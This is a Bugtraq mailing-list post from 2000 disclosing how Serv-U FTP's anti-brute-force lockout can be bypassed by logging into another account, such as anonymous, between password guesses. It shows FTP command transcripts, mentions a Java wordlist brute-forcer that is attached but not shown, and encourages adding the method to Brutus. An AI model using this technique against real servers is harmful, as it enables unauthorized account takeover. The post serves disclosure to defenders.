Bugtraq mailing list archives
Brute Forcing FTP Servers with enabled anti-hammering (anti brute-force) modus
From: Craig <Craig () FREENET DE>
Date: Sun, 29 Oct 2000 14:16:54 +0100
Brute Forcing FTP Servers with enabled anti-hammering (ant brute-force) modus ----------------------------------------------------------------------------- While playing around with Serv-U FTP Server, I found out that it is possible to bypass it's hammering protection which should protect accounts from being brute-forced. In the following text I will explain this step by step. A user logs into an ftp server like this: USER USERNAME PASS PASSWORD When the user entered an invalid password for 3 times he will be disconnected and is not allowed to connect again for a specified time - so far so good, but i wondered what happened if I tried another users account in order to try 3 passwords for every user per connection (lines with the prefix ">" are from the server) : USER USER1
331 User name okay, need password.
PASS PASSWORD
530 Not logged in.
USER USER1
331 User name okay, need password.
PASS nextpassPASSWORD
530 Not logged in.
USER USER2
331 User name okay, need password.
PASS anotherPASSWORD
530 Not logged in.
I was disconnected, and already about to give up when I noticed that anonymous login was enabled: USER USER1
331 User name okay, need password.
PASS PASSWORD
530 Not logged in.
USER USER1
331 User name okay, need password.
PASS nextpassPASSWORD
530 Not logged in.
USER anonymous
331 User name okay, please send complete E-mail address as password.
PASS somemail () address com
230 User logged in, proceed.
USER USERNAME
331 User name okay, need password.
PASS 3rdPASSWORD
530 Not logged in.
USER USERNAME
331 User name okay, need password.
PASS 4thPASSWORD
530 Not logged in.
... ... BINGO! That worked! This does not only work with anonymous access, you just need to log into an account and then you can retry to log into the user's account! I coded a little program in java to automate the brute forcing process which reads the passwords from a wordlist. In my local network it tested about 100 passwords per minute - that is not very fast, but it only uses one connection and as far as i know it's the only tool that bypasses the anti brute-force function... Brutus-aet2 (with 10 connections, 10ms timeout, disabled anti-hammering of course) made 20 tries per second - my program is only single-threaded, but if its method was implented into brutus-aet3 it might be the fastest ftp brute-force tool ever :) - Craig Craig () Freenet de http://www.HaQuarter.De (only German yet) Download Brutus at http://www.hobbie.net/brutus P.S.:Before writing this, I did a quick search at securityfocus, but i did not find anything about this issue, if this was already known i am sorry for wasting your time!
Attachment:
newftpbrute.java
Description:
Current thread:
- Brute Forcing FTP Servers with enabled anti-hammering (anti brute-force) modus Craig (Oct 30)